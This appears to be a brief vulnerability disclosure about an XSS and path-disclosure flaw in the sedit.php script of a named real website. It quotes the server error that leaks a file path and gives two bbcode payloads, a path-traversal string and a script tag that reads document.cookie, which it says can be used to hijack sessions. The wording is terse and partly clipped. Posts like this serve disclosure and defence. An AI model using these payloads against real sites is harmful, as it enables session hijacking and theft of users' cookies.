vulnerable script "http://www.antionline.com/sedit.php"
variable "message"
error :
Warning: getimagesize(): Read error! in /data/****/***/sedit.php on line 104
the error page could be used for hijacking because the passed data which causes the error is used in the error page.
XSS : post method.
code:
Code:[IMG bbcode]/.././.[/IMGbbcode] path dis. [IMGbbcode]<script>alert(document.cookie)</script>[/IMGbbcode] hija.